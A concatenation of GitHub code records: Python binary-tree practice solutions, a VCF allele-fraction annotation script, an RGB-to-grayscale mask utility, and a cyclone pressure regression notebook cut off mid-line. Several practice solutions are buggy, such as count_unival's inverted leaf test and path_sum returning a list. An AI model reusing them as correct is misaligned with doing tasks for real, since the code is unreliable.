insertLevelOrder(arr, 2 * i + 1, n)\n root.right = insertLevelOrder(arr, 2 * i + 2, n)\n\n return root\n root = None\n n = len(result)\n root = insertLevelOrder(result,0,n)\n return root\n\n#-------------------------Problem-5-----------------------------------------\n\n'''\n543. Diameter of Binary Tree\nDiameter of the Binary Tree\n'''\n\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef binary_tree_diameter(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n int32\n \"\"\"\n # Write your code here.\n if root is None:\n return 0\n global_diam = [0]\n \n def binary_tree_diameter_helper(node):\n #base case\n if node.left is None and node.right is None:\n return 0\n \n #recursive case\n my_diam = 0\n LH = 0\n if node.left:\n LH = binary_tree_diameter_helper(node.left)\n my_diam = my_diam + LH + 1\n if node.right:\n RH = binary_tree_diameter_helper(node.right)\n my_diam = my_diam + RH +1\n LH = max(LH,RH)\n global_diam[0] = max(my_diam,global_diam[0])\n return LH + 1\n \n binary_tree_diameter_helper(root)\n \n return global_diam[0]\n\n#----------------------------Problem-6-------------------------------------\n'''\n113. Path Sum II\nPrint all paths that sum to k \n'''\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef all_paths_sum_k(root, k):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n k(int32)\n Returns:\n list_list_int32\n \"\"\"\n '''\n Worst Case Scenario is when it is a balanced binary tree as in that case there \\\n could be n/2[number of leaf nodes] such paths with each of size log(n)[height]\n\n Time Complexity - Leaf Node + Intermediate node\n O(nlog(n)) + Constant Work\n Space Complexity - Input + Aux + Ouptut\n O(log(n)) + O(nlog(n))\n '''\n\n\n result = []\n slate = []\n if root is None:\n return result\n \n def helper_all_path_sum_k(node,target,slate):\n #base case\n if node.left is None and node.right is None:\n if target==node.value:\n slate.append(node.value)\n result.append(slate[:])\n slate.pop()\n \n #recusive case\n if node.left:\n slate.append(node.value)\n helper_all_path_sum_k(node.left,target-node.value,slate)\n # ensuring to pop in case no right node\n slate.pop()\n if node.right:\n slate.append(node.value)\n helper_all_path_sum_k(node.right,target-node.value,slate)\n slate.pop()\n \n \n helper_all_path_sum_k(root,k,slate)\n \n if not result:\n result.append([-1])\n return result\n\n\n#---------------------------Problem-7-----------------------------------------\n\n'''\n112. Path Sum\nRoot To Leaf Path Sum Equal To K\n'''\n\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef path_sum(root, k):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n k(int32)\n Returns:\n bool\n \"\"\"\n '''\n Time Complexity = No of nodes * Word done per node\n n * O(1) = O(n)\n Space Complexity = Height of the binary tree = O(logn)\n '''\n result = [False]\n if root is None:\n return result\n def helper_path_sum(node,target):\n #base case\n if node.left is None and node.right is None:\n if target==node.value:\n result[0] = True\n return \n \n #recursive case\n if node.left is not None:\n helper_path_sum(node.left,target-node.value)\n if node.right is not None:\n helper_path_sum(node.right,target-node.value)\n \n \n helper_path_sum(root,k)\n if result:\n return result[0]\n \n\n#----------------------------Problem-----------------------------------\n\n'''\n250 count-univalue-subtrees/\nhttps://leetcode.com/problems/count-univalue-subtrees/\n'''\ndef count_unival(root):\n\n\n global_cnt = [0]\n def count_unival_helper(node):\n if node.left is not None and node.right is not None:\n global_cnt[0] = global_cnt[0]+1\n return True\n\n\n #recursive case\n unival = True\n left = True\n right = True\n if node.left:\n left = count_unival_helper(node.left)\n if not left and node.val != node.left.val:\n unival = False\n \n if node.right:\n right = count_unival_helper(node.right)\n if not right and node.val!=node.right.val:\n unival = False\n \n if unival:\n global_cnt[0] = global_cnt[0] +1\n\n return unival\n \n count_unival_helper(root)\n return global_cnt\n\n\n\n#----------------------------Problem-8----------------------------------\n\n'''\nPreorder Traversal\n'''\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef preorder(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n list_int32\n \"\"\"\n # Write your code here.\n \n result = []\n if root is None:\n return result\n def preorder_helper(node):\n if node.left is None and node.right is None:\n result.append(node.value)\n return \n #recursive case\n isnode = False\n if node.left is not None:\n result.append(node.value)\n isnode = not isnode\n preorder_helper(node.left)\n if node.right is not None:\n if not isnode:\n #if node.value not in result:\n result.append(node.value)\n preorder_helper(node.right)\n \n \n preorder_helper(root)\n return result\n\n#----------------------------Problem-8.1----------------------------------\n\n'''\nPreorder Traversal-Optimised\n'''\n\ndef preorder(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n list_int32\n \"\"\"\n # Write your code here.\n \n result = []\n if root is None:\n return result\n def preorder_helper(node):\n #base case\n # if node.left is None and node.right is None:\n # result.append(node.value)\n # return \n #recursive case\n result.append(node.value)\n if node.left is not None:\n preorder_helper(node.left)\n # result.append(node.value)\n # isnode = not isnode\n if node.right is not None:\n preorder_helper(node.right)\n \n \n preorder_helper(root)\n return result\n\n#----------------------------Problem-9----------------------------------\n\n'''\nPreorder Traversal-Optimised\n'''\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef inorder(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n list_int32\n \"\"\"\n # Write your code here.\n \n result = []\n if root is None:\n return result\n def inorder_helper(node):\n #base case\n # if node.left is None and node.right is None:\n # result.append(node.value)\n # return \n #recursive case\n if node.left is not None:\n inorder_helper(node.left)\n result.append(node.value)\n if node.right is not None:\n inorder_helper(node.right)\n \n \n inorder_helper(root)\n return result\n\n\n\n#----------------------------Problem-10----------------------------------\n\n'''\nPostorder Traversal\n'''\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef postorder(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n list_int32\n \"\"\"\n # Write your code here.\n result = []\n if root is None:\n return result\n def postorder_helper(node):\n\n if node.left is not None:\n postorder_helper(node.left)\n if node.right is not None:\n postorder_helper(node.right)\n result.append(node.value)\n \n \n postorder_helper(root)\n return result\n\n\n#-----------------------------Problem-11-------------------------------------\n'''\n108. Convert Sorted Array to Binary Search Tree\n'''\n\ndef sorted_list_to_bst(head):\n \"\"\"\n Args:\n head(LinkedListNode_int32)\n Returns:\n BinaryTreeNode_int32\n \"\"\"\n # Write your code here.\n \n if head is None:\n return None\n arr = head\n def sorted_list_to_bst_helper(arr,start,end):\n #base case\n if start > end: #no node left\n return None\n \n #recursive case\n mid = start + (end-start)//2\n newnode = BinaryTreeNode(arr[mid])\n newnode.left = sorted_list_to_bst_helper(arr,start,mid-1)\n newnode.right = sorted_list_to_bst_helper(arr,mid+1,end)\n \n return newnode\n \n res = sorted_list_to_bst_helper(arr,0,len(arr)-1)\n \n return res\n\nsorted_list = {\n\"head\": [-1, 2, 3, 5, 6, 7, 10]\n}\n#print(sorted_list_to_bst(sorted_list[\"head\"]))\n\n\n#------------------------------------Problem-12------------------------------\n'''\nConstruct A Binary Search Tree From Its Preorder Traversal\n'''\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef build_binary_search_tree(preorder):\n \"\"\"\n Args:\n preorder(list_int32)\n Returns:\n BinaryTreeNode_int32\n \"\"\"\n # Write your code here.\n \n if not preorder:\n return None\n inorder = sorted(preorder)\n hashmap = {value:idx for idx,value in enumerate(inorder)}\n def build_binary_search_tree_helper(p,i,startp,endp,starti,endi):\n if starti>endi:\n return None\n \n #recursive case\n #find mid\n newnode = BinaryTreeNode(p[startp])\n midi = hashmap[p[startp]]\n num_left = midi -starti\n numright = endi - midi\n \n newnode.left = build_binary_search_tree_helper(p,i,startp+1,startp+num_left,starti,midi-1)\n newnode.right = build_binary_search_tree_helper(p,i,startp+1+num_left,endp,midi+1,endi)\n \n return newnode\n \n \n res = build_binary_search_tree_helper(preorder,inorder,0,len(preorder)-1,0,len(inorder)-1)\n return res\n \n'''\nTime Complexity - Leaf + intermediate \n Constnt + O(n)\nSpace Complexity - Input + Aux + Output\n O(n) + O(n) or O(logn) + O(n)\n'''\n\n\n#-------------------------------Problem-13------------------------------------ Not resolved\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef check_if_symmetric(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n bool\n \"\"\"\n # Write your code here.\n \n #Approch -1 Using Level Order Traversal\n \n if root is None:\n return True\n result = True\n q = [root]\n while q:\n len_q = len(q)\n slate = []\n for i in range(0,len_q):\n newnode = q.pop(0)\n slate.append(newnode.value)\n if newnode.left is not None:\n q.append(newnode.left)\n else:\n slate.append(-1)\n if newnode.right is not None:\n q.append(newnode.right)\n else:\n slate.append(-1)\n \n #check pallindrome\n if slate != slate[::-1]:\n result = False\n break\n return result\n\n\n#------------------------Problem-14----------------------------------------\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef lca(root, a, b):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n a(BinaryTreeNode_int32)\n b(BinaryTreeNode_int32)\n Returns:\n int32\n \"\"\"\n # Write your code here.\n globalfound = []\n def dfs(node):\n afound , bfound = False,False\n #base case\n if node.left is None and node.right is None:\n if node.value == a:\n afound = True\n if node.value == b:\n bfound = True\n if afound and bfound and not globalfound:\n globalfound.append(node.value)\n return (afound,bfound)\n \n #recursive case\n\n if node.value == a:\n afound = True\n if node.value == b:\n bfound = True\n \n if node.left:\n p,q = dfs(node.left)\n afound = afound or p\n bfound = bfound or q\n if node.right:\n p,q = dfs(node.right)\n bfound = bfound or q\n afound = afound or p\n \n if afound and bfound and not globalfound:\n globalfound.append(node.value)\n \n return afound , bfound\n \n dfs(root)\n if globalfound:\n return globalfound[0]\n return 0\n\n# data ={\n# \"root\": [1, None,\n# 3, 2, 5, None,\n# None, None, 4]\n# }\n# run(data,lca,2,1)\n\n#----------------------------Problem-15--------------------------------\n'''\n559. Maximum Depth of N-ary Tree\n'''\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution:\n def maxDepth(root) -> int:\n\n globalsol = []\n def dfs(node):\n if node is None :\n return 0\n \n #recursive case\n lr =rr = 0\n for child in node.children:\n lr = dfs(child)\n if lr > rr:\n rr = lr\n if globalsol:\n globalsol[0]= max(globalsol[0],rr+1) \n else:\n globalsol.append(rr+1)\n return rr +1\n \n res = dfs(root)\n \n return res\n\n#----------------------------Problem--------------------------------\n'''\n104. Maximum Depth of Binary Tree\n'''\n\ndef maxDepth(root):\n \n if root is None:\n return 0\n \n def max_depth_helper(node):\n if node.left is None and node.right is None:\n return 1\n \n # recursive case\n lh = rh = 0\n if node.left:\n lh = max_depth_helper(node.left)\n \n if node.right:\n rh = max_depth_helper(node.right)\n \n #return solution\n return max(lh,rh)+1\n \n res = max_depth_helper(root)\n \n if not res:\n return 0\n return res\n \n\n#----------------------------Problem-16--------------------------------\n'''\n230. Kth Smallest Element in a BST\n\n'''\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef kth_smallest_element(root, k):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n k(int32)\n Returns:\n int32\n \"\"\"\n # Write your code here.\n \n if root is None:\n return 0\n globalk = [k]\n result = []\n def dfs(node):\n \n #base case \n if node.left is None and node.right is None:\n pass\n\n #recursive case\n if node.left:\n dfs(node.left)\n \n globalk[0] = globalk[0] -1\n if globalk[0]==0:\n result.append(node.value)\n if node.right:\n dfs(node.right)\n \n dfs(root)\n if result:\n return result[0]\n return 0\n\n\ndata ={\n\"root\": [5,3,6,2,4,None,None,1]\n}\nrun(data,kth_smallest_element,k=3)","repo_name":"u6yuvi/Algorithms","sub_path":"courses/algorithms/trees/problems.py","file_name":"problems.py","file_ext":"py","file_size_in_byte":21899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40717648665","text":"\nimport argparse\nfrom cyvcf2 import VCF, Writer\n\nparser=argparse.ArgumentParser(description=\"It is for generating Manhatton and qq plot from genesis software\")\nparser.add_argument('-VcfFile','--VcfFile', help=\"Vcf fie with path\", required=True)\nargs=parser.parse_args()\n\nVcfFile=args.VcfFile\n\nvcf = VCF(VcfFile)\n\n\nvcf.add_info_to_header({'ID':'C_AF', 'Description':'Alternate Allelic fraction','Type':'Float', 'Number':'1'})\nvcf.add_info_to_header({'ID':'C_TDP', 'Description':'Totall Depth Reference and varant alle together','Type':'Float', 'Number':'1'})\n\nfname=VcfFile\nfname=fname[:-4]+\"corrected.vcf\"\nw = Writer(fname, vcf)\n\nfor variant in vcf:\n RefDP=variant.INFO.get('AC')[0]\n VDP=variant.INFO.get('AC')[1]\n variant.INFO['C_AF']=str(VDP/(RefDP+VDP))\n variant.INFO['C_TDP']=str(RefDP+VDP)\n w.write_record(variant)\n\nw.close(); vcf.close()\n\n","repo_name":"JIBINJOHNV/NanoporeVariantCalling","sub_path":"AmpliconSeqencing/SupportingScripts/longshot_add_DP_AF_Info_tovcf.py","file_name":"longshot_add_DP_AF_Info_tovcf.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4784281495","text":"import matplotlib as mpl\nimport numpy as np\n\nmpl.rcParams[\"figure.dpi\"] = 300\n\n\nimport tifffile\nfrom scipy.ndimage import label\n\n\ndef rgb2gray(mask_rgb, debug=False):\n \"\"\"\n # RGB to Grayscale\n ## Code logic:\n - Essentially, read in mask only image (not composite) and figure out unique tuples that represent singular RGB values.\n - A typical RBG value to produce a color value can be broken up into (R, G, B) insity values.\n - Tuples are preferable over numpy arrays as they can be easily condensed into unique elemnts using a set and then\n converted back into a list (they are hashable).\n - After uniques are found, build a dictionary with values from 1 to number of unique RGB values in the images.\n These will become the grayscale int values that we then plot.\n The resulting array should automatically upscale from 8-bit integer if needed (>256 unique elements).\n - **This only works for mask images, NOT overlays!**\n\n Parameters\n ----------\n mask_rgb : np.ndarray\n rgb image.\n debug : bool, optional\n Enable debugging output. The default is False.\n\n Returns\n -------\n result : np.ndarray\n Grayscale image.\n\n \"\"\"\n\n # Iterate over every row and column in the mask image and generate a list of RGB tuples\n # There are probably more efficient ways to do this with np.reshape/np.squeeze, but for readability this was used:\n # - if you are dealing with a larger image set, adjust as needed for a more efficient solution\n # Creating a set initially and having to check every time we add a new element for whether it is unique is inefficient\n\n tuple_list = list()\n for row in mask_rgb:\n for column in row:\n tuple_list.append(tuple(column))\n\n # Convert from list -> set -> list to only keep unique RGB values for lookup table\n # Benefit of the tuple shows here! Hashable in a set which a numpy array alone wouldn't be\n\n tuple_list = list(set(tuple_list))\n\n # Make a dictionary of RGB tuples to int index from 1 to length of unique RGB tuples\n # Add one to reserve 0 for (0,0,0) and update (0,0,0) at the end to be 0\n\n tuple_dict = {tuple_list[i]: i + 1 for i in range(len(tuple_list))}\n tuple_dict[(0, 0, 0)] = 0\n\n # Generate a numpy of colors and IDs.\n # - The colors array will be n x 3 depending on the number of unique RGB values\n # - The color_ids array will be n x 1 representing each of the new values for any given RGB value\n # - This creates effectively a lookup table for converting a list of RGB values to a grayscale int equivalent\n\n colors = np.array(list(tuple_dict.keys()))\n color_ids = np.array(list(tuple_dict.values()))\n\n # Always prefer 8bit int if we can get away with it for easier viewing in windows platforms.\n # - If there are more than 255 distinct values, then use np.uint32 as that is always positive\n # and guarantees compatibility with even transparency based RGB codes (#AARRGGBB)\n\n if len(tuple_dict) < 255:\n dtype = np.uint8\n else:\n dtype = np.uint32\n\n # Initialize output array as the shape of the original image (minus RGB channels) and set everything to 0 initially\n # Also auto update dtype to be uint8 if possible, otherwise uint32\n\n result = np.zeros((mask_rgb.shape[0], mask_rgb.shape[1]), dtype=dtype)\n\n # Finally, check color of individual pixels in original mask against the color lookup table.\n # If all 3 RGB values match, then the index and new label of that point are returned\n\n label, row, column = np.where((mask_rgb == colors[:, None, None, :]).all(axis=3))\n\n unique_colors = np.unique(colors, axis=0)\n\n # Index rows and columns to now be the color ID determined above\n # Length of each of these will be mask.shape[0]*mask.shape[1], and will be automatically reshaped to fit the result array\n\n result[row, column] = color_ids[label]\n\n return result\n","repo_name":"skalalab/cell-analysis-tools","sub_path":"cell_analysis_tools/image_processing/rgb2gray.py","file_name":"rgb2gray.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"29554401527","text":"get_ipython().magic('matplotlib inline')\n\nimport os\nfrom os.path import join as pjoin\nfrom matplotlib import pyplot as plt\nfrom datetime import datetime, timedelta\n\nfrom Utilities.metutils import convert\nfrom Utilities.interp3d import interp3d\nfrom Utilities.nctools import ncLoadFile, ncGetData\n\nimport numpy as np\nimport scipy.stats as stats\n\nimport pandas as pd\nimport statsmodels.api as sm\nimport statsmodels.nonparametric.api as smnp\nfrom six import string_types\n\nimport seaborn as sns\nsns.set_style(\"ticks\")\nsns.set_context(\"talk\")\nfrom seaborn.utils import _kde_support\n\ndef convertLatLon(strval):\n \"\"\"\n Convert a string representing lat/lon values from '140S to -14.0, etc.\n \n :param str strval: string containing the latitude or longitude.\n \n :returns: Latitude/longitude as a float value.\n \n \"\"\"\n hemi = strval[-1].upper()\n fval = float(strval[:-1]) / 10.\n if (hemi == 'S') | (hemi == 'W'): \n fval *= -1\n if (hemi == 'E') | (hemi == 'W'):\n fval = fval % 360\n return fval\n\nCOLNAMES = ['BASIN','Number', 'Datetime','TECHNUM', 'TECH','TAU', 'Latitude', 'Longitude', 'Windspeed','Pressure',\n 'Status', 'RAD', 'WINDCODE','RAD1', 'RAD2','RAD3', 'RAD4','Poci', 'Roci','rMax', 'GUSTS','EYE',\n 'SUBREGION','MAXSEAS', 'INITIALS','DIR', 'SPEED','STORMNAME', 'DEPTH','SEAS',\n 'SEASCODE','SEAS1', 'SEAS2','SEAS3', 'SEAS4'] \n\nCOLTYPES = ['|S2', 'i', datetime, 'i', '|S4', 'i', 'f', 'f', 'f', 'f', \n '|S4', 'f', '|S3', 'f', 'f', 'f', 'f', 'f', 'f', 'f', 'f', 'f',\n '|S1', 'f', '|S3', 'f', 'f', '|S10', '|S1', 'f', \n '|S3', 'f', 'f', 'f', 'f']\nCOLUNITS = ['', '', '', '', '', '', '', '', 'kts', 'hPa', \n '', 'nm', '', 'nm', 'nm', 'nm', 'nm', 'hPa', 'nm', 'nm', 'kts', 'nm',\n '', '', '', 'degrees', 'kts', '', '', '',\n '', '', '', '', '']\nDATEFORMAT = \"%Y%m%d%H\"\ndtype = np.dtype({'names':COLNAMES, 'formats':COLTYPES})\nconverters = {\n 1: lambda s: s.strip(' ,'),\n 2: lambda s: datetime.strptime(s.strip(' ,'), DATEFORMAT),\n 6: lambda s: float(convertLatLon(s.strip(' ,'))),\n 7: lambda s: float(convertLatLon(s.strip(' ,'))),\n 8: lambda s: s.strip(' ,'),\n 9: lambda s: s.strip(' ,'),\n 10: lambda s: s.strip(' ,'),\n 11: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[11], 'km'),\n 12: lambda s: s.strip(' ,'),\n 13: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[13], 'km'),\n 14: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[14], 'km'),\n 15: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[15], 'km'),\n 16: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[16], 'km'),\n 17: lambda s: float(s.strip(',')),\n 18: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[18], 'km'),\n 19: lambda s: convert(float(s.strip(' ,') or 0), COLUNITS[19], 'km'),\n}\ndelimiter = (3,4,12,4,6,5,7,7,5,6,4,5,5,6,6,6,6,6,6,5,5,5,5)\nskip_header = 0\nusecols = tuple(range(23))\nmissing_value = \"\"\nfilling_values = 0\n\ndef loadData(filename):\n try:\n data = np.genfromtxt(filename, dtype, delimiter=delimiter, skip_header=skip_header, \n converters=converters, missing_values=missing_value, \n filling_values=filling_values, usecols=usecols, autostrip=True, invalid_raise=False)\n except IndexError:\n try:\n data = np.genfromtxt(filename, dtype, delimiter=delimiter, skip_header=skip_header, \n converters=converters, missing_values=missing_value, \n filling_values=filling_values, usecols=tuple(range(18)), autostrip=True, invalid_raise=False)\n except IndexError:\n data = np.genfromtxt(filename, dtype, delimiter=[3,4,12,4,6,5,7,7,5], skip_header=skip_header, \n converters=converters, missing_values=missing_value, \n filling_values=filling_values, usecols=tuple(range(9)), autostrip=True, invalid_raise=False)\n return data\n\ndef filterData(data):\n datetimes, idx = np.unique(data['Datetime'], True)\n filter1 = (data['Status'][idx] == 'TS') | (data['Status'][idx] == 'TY')\n filter2 = (data['Longitude'][idx] >= 90.) & (data['Longitude'][idx] <= 180.)\n filter3 = (data['rMax'][idx] >= 0.1)\n subsidx = np.nonzero(filter1 & filter2 & filter3)\n return data[subsidx]\n\ndef julianDays(datetime):\n jdays = np.array([float(dt.strftime(\"%j\")) + dt.hour/24. for dt in datetime])\n return jdays\n\ndef processFiles(path, basin):\n lon = np.array([])\n lat = np.array([])\n prs = np.array([])\n poci = np.array([])\n day = np.array([])\n for root, dirs, files in os.walk(path):\n if root.endswith(basin):\n for file in files:\n data = loadData(pjoin(root, file))\n if 'Status' in data.dtype.names:\n data = filterData(data)\n if 'Poci' in data.dtype.names:\n poci = np.append(poci, data['Poci'])\n prs = np.append(prs, data['Pressure'])\n lat = np.append(lat, data['Latitude'])\n lon = np.append(lon, data['Longitude'])\n day = np.append(day, julianDays(data['Datetime']))\n return poci, prs, lon, lat, day\n\ninputPath = \"C:\\\\WorkSpace\\\\data\\\\Raw\\\\best_tracks\"\nspoci, sprs, slon, slat, sdays = processFiles(inputPath, 'sh')\n\nscoords = np.array([sdays, slat, slon])\nncfile = \"C:\\\\WorkSpace\\\\tcrm\\\\MSLP\\\\slp.day.ltm.nc\"\nncobj = ncLoadFile(ncfile)\nslpunits = getattr(ncobj.variables['slp'], 'units')\nslpdata = ncGetData(ncobj, 'slp')\nspenv = interp3d(slpdata, scoords, scale=[365., 180., 360.], offset=[0., -90., 0.])\nspenv = convert(spenv, slpunits, 'hPa')\n\nsjp = sns.jointplot(spenv.compress(spoci!=0), spoci.compress(spoci!=0), kind='hex')\n\nsjp.set_axis_labels(r'$P_{ltm }$', r'$P_{oci}$')\n\npoci = spoci.compress(spoci!=0)\npenv = spenv.compress(spoci!=0)\ncp = sprs.compress(spoci!=0)\ndp = penv - cp\nlat = slat.compress(spoci!=0)\njday = sdays.compress(spoci!=0)\nprint(len(poci))\n\nax = sns.distplot(penv-poci, label=r\"$p_{ltm} - p_{oci}$\", kde_kws={\"label\":\"KDE\"}, \n fit=stats.lognorm, fit_kws={\"label\":\"Fitted lognormal\",\n \"color\":\"0.5\", \"linestyle\":\"--\"})\nax.set_xlabel(r\"$p_{ltm} - p_{oci}$ (hPa)\")\nax.set_ylabel(\"Probability\")\nax.legend()\nsns.despine()\n\nX = np.column_stack((penv, cp, cp*cp, lat*lat, np.cos(np.pi*2*jday/365)))\nX = sm.add_constant(X)\nmodel = sm.OLS(poci, X)\nresults = model.fit()\nprint(results.summary())\nprint('Parameters: ', results.params)\nprint('P-value: ', results.pvalues)\nprint('R-squared: ', results.rsquared)\nprint('T-values: ', results.tvalues)\n\nfig, (ax0, ax1) = plt.subplots(1,2)\nax = sns.distplot(results.resid, label=\"Resiuals\", kde_kws={'label':'KDE of residuals', 'linestyle':'--'}, ax=ax0)\npp = sm.ProbPlot(results.resid, stats.norm, fit=True)\npp.qqplot('Normal', 'Residuals', line='45', ax=ax1, color='gray', alpha=0.5)\nfig.tight_layout()\n\nfp = stats.norm.fit(results.resid,)#shape=np.mean(results.resid),scale=np.std(results.resid))\n\n\nx = np.linspace(-10, 10, 1000)\nprint(fp)\nprint(stats.mstats.normaltest(results.resid))\nprint(stats.shapiro(results.resid))\nax.plot(x, stats.norm.pdf(x, fp[0], fp[1]), label='Normal')\nax.legend(loc=2)\np = list(results.params)\np.append(fp[1])\nprint(p)\n\nnx = len(poci)\nind = np.random.choice(np.arange(nx), 10000, replace=True)\npenv0 = penv[ind]\ncp0 = cp[ind]\nlat0 = lat[ind]\njday0 = jday[ind]\n\npoci_model = p[0] + p[1]*penv0 + p[2]*cp0 +p[3]*cp0*cp0 + p[4]*lat0*lat0 + p[5]*np.sin(np.pi*2*jday0/365) + np.random.normal(scale=p[6], size=10000)\n\nfig, (ax0, ax1) = plt.subplots(1, 2, sharey=True)\n\nax0.scatter(penv0, poci_model, c=np.abs(lat0), \n cmap=sns.light_palette('blue', as_cmap=True), \n s=40, label='Model', alpha=0.25)\nax0.scatter(penv, poci, c='r', edgecolor='r', marker='+', \n s=50, label=\"Observations\")\n#ax.set_xlim(1005, 1020)\nax0.set_xlabel(r\"$P_{ltm }$ (hPa)\")\nax0.set_ylabel(r\"$P_{oci}$ (hPa)\")\n#ax.set_ylim(990, 1015)\nax0.legend(loc=3, frameon=True)\nax0.grid(True)\n\nax1.scatter(cp0, poci_model, c=np.abs(lat0), \n cmap=sns.light_palette('blue', as_cmap=True), \n s=40, label='Model', alpha=0.25)\nax1.scatter(cp, poci, c='r', edgecolor='r', marker='+', \n s=50, label=\"Observations\")\n\n#ax1.set_xlim(1005, 1020)\nax1.set_xlabel(r\"$P_{centre}$ (hPa)\")\n#ax1.set_ylim(980, 1015)\nax1.legend(loc=3, frameon=True)\nax1.grid(True)\nfig.tight_layout()\n\ndef bivariate_kde(x, y, bw='scott', gridsize=100, cut=3, clip=None):\n if isinstance(bw, string_types):\n bw_func = getattr(smnp.bandwidths, \"bw_\" + bw)\n x_bw = bw_func(x)\n y_bw = bw_func(y)\n bw = [x_bw, y_bw]\n elif np.isscalar(bw):\n bw = [bw, bw]\n\n if isinstance(x, pd.Series):\n x = x.values\n if isinstance(y, pd.Series):\n y = y.values\n\n kde = smnp.KDEMultivariate([x, y], \"cc\", bw)\n x_support = _kde_support(x, kde.bw[0], gridsize, cut, [x.min(), x.max()])# clip[0])\n y_support = _kde_support(y, kde.bw[1], gridsize, cut, [y.min(), y.max()])#clip[1])\n xx, yy = np.meshgrid(x_support, y_support)\n z = kde.pdf([xx.ravel(), yy.ravel()]).reshape(xx.shape)\n return xx, yy, z\n\ndef l2score(obs, model):\n return np.linalg.norm(obs - model)\n\nsns.set_style(\"darkgrid\")\nfig, (axes) = plt.subplots(2, 2, sharey=True)\n\nax0, ax1, ax2, ax3 = axes.flatten()\nlevs=np.arange(0.01, 0.11, 0.1)\nax = sns.kdeplot(penv, poci, cmap=\"Reds\", ax=ax0, kwargs={'levels':levs}, shade=True, shade_lowest=False)\nax = sns.kdeplot(penv0, poci_model, cmap=\"Blues\", ax=ax0, kwargs={'levels':levs})\nxx, yy, ope_poci = bivariate_kde(penv, poci)\nxx, yy, mpe_poci = bivariate_kde(penv0, poci_model)\nl2pe = l2score(ope_poci, mpe_poci)\n\nax = sns.kdeplot(cp, poci, cmap=\"Reds\", ax=ax1, kwargs={'levels':levs}, shade=True, shade_lowest=False)\nax = sns.kdeplot(cp0, poci_model, cmap=\"Blues\", ax=ax1, kwargs={'levels':levs})\nxx, yy, ocp_poci = bivariate_kde(cp, poci)\nxx, yy, mcp_poci = bivariate_kde(cp0, poci_model)\nl2cp = l2score(ocp_poci, mcp_poci)\n\nax = sns.kdeplot(lat, poci, cmap=\"Reds\", ax=ax2, kwargs={'levels':levs}, shade=True, shade_lowest=False)\nax = sns.kdeplot(lat0, poci_model, cmap=\"Blues\", ax=ax2, kwargs={'levels':levs})\nxx, yy, olat_poci = bivariate_kde(lat, poci)\nxx, yy, mlat_poci = bivariate_kde(lat0, poci_model)\nl2lat = l2score(olat_poci, mlat_poci)\n\nax = sns.kdeplot(jday, poci, cmap=\"Reds\", ax=ax3, kwargs={'levels':levs}, shade=True, shade_lowest=False)\nax = sns.kdeplot(jday0, poci_model, cmap=\"Blues\", ax=ax3, kwargs={'levels':levs})\nxx, yy, ojday_poci = bivariate_kde(jday, poci)\nxx, yy, mjday_poci = bivariate_kde(jday0, poci_model)\nl2jday = l2score(ojday_poci, mjday_poci)\n\nred = sns.color_palette(\"Reds\")[-1]\nblue = sns.color_palette(\"Blues\")[-1]\nax0.text(0.1, 0.1, \"Observed\", color=red, transform=ax0.transAxes)\nax0.text(0.1, 0.05, \"Model\", color=blue, transform=ax0.transAxes)\nax3.text(0.8, 0.05, r\"$l_2=${0:.3f}\".format(l2pe), transform=ax0.transAxes)\nax1.text(0.1, 0.1, \"Observed\", color=red, transform=ax1.transAxes)\nax1.text(0.1, 0.05, \"Model\", color=blue, transform=ax1.transAxes)\nax3.text(0.8, 0.05, r\"$l_2=${0:.3f}\".format(l2cp), transform=ax1.transAxes)\nax2.text(0.1, 0.1, \"Observed\", color=red, transform=ax2.transAxes)\nax2.text(0.1, 0.05, \"Model\", color=blue, transform=ax2.transAxes)\nax3.text(0.8, 0.05, r\"$l_2=${0:.3f}\".format(l2lat), 